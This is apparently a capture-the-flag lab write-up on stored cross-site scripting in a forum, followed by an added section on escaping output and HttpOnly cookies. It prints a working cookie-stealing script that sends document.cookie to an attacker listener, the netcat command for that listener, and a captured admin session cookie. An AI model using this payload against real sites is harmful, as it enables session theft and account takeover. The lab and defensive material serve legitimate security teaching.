McSkidy knows the crisis isn’t over. The best thing to do at this point is OSINT; we need to learn more about the Christmas Monster.
During their OSINT, they came across a Hacker Forum. Their research has shown them that this forum belongs to the Christmas Monster. Can they gain access to the admin section of the forum? They haven’t made an account yet so make sure to register.
Access the machine at http://[your-ip-address]:3000 - it may take a few minutes to deploy.
Check out the supporting material here.
P.S. If you want to learn more about XSS, we have a room where you can learn about it in depth.
Setup
First, let’s try all the form posts to see if there is an XSS attack vector.

As you can see, the website is vulnerable to stored XSS.
Now let’s implement a cookie stealer.
Reference: How to Write an XSS Cookie Stealer in JavaScript to Steal Passwords
<script>window.location = 'http://10.9.45.74:9999/page?param=' + document.cookie </script>
Now let’s start a listener and wait for the admin’s token:
nc -lnvp 9999
#1 What is the admin’s authid cookie value?
kali@kali:~$ nc -lnvp 9999
listening on [any] 9999 ...
connect to [10.9.45.74] from (UNKNOWN) [10.10.125.201] 55668
GET /page?param=authid="2564799a4e6689972f6d9e1c7b406f87065cbf65" HTTP/1.1
Host: 10.9.45.74
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/77.0.3844.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://localhost:3000/admin
Accept-Encoding: gzip, deflate
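As an added example (not part of the room or of this writeup), here is how the forum could have blunted this attack: HTML-encode post bodies before rendering them, and mark the session cookie HttpOnly so injected script cannot read it through document.cookie. The function names, the sample post and the EXAMPLE_HOST placeholder are my own assumptions.

```javascript
// Added example: the stored-XSS weakness from the writeup beside two fixes
// a defender applies. Runs in Node with no dependencies.

// Vulnerable: the forum post body is concatenated straight into the page,
// so a <script> tag in a post is parsed and executed by the admin's browser.
function renderPostUnsafe(body) {
  return `<div class="post">${body}</div>`;
}

// Fix 1: encode the HTML-significant characters so user-supplied markup is
// displayed as text instead of being parsed as tags.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderPostSafe(body) {
  return `<div class="post">${escapeHtml(body)}</div>`;
}

// Fix 2: build the Set-Cookie header for the session cookie with HttpOnly,
// which removes it from document.cookie, plus Secure and SameSite=Strict so
// it is only sent over HTTPS and only on same-site requests.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Strict`;
}

// Quick check usable in a review of rendered pages or stored posts: does the
// output still contain an executable script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample post of the kind the writeup submits, with a placeholder
// host in place of a real listener address.
const samplePost =
  "<script>window.location = 'http://EXAMPLE_HOST:9999/page?param=' + document.cookie</script>";

console.log(containsScriptTag(renderPostUnsafe(samplePost))); // true
console.log(containsScriptTag(renderPostSafe(samplePost)));   // false
console.log(sessionCookieHeader('authid', 'PLACEHOLDER_TOKEN'));
```

With HttpOnly set, the payload above still redirects the admin, but the request reaching the listener carries no authid value.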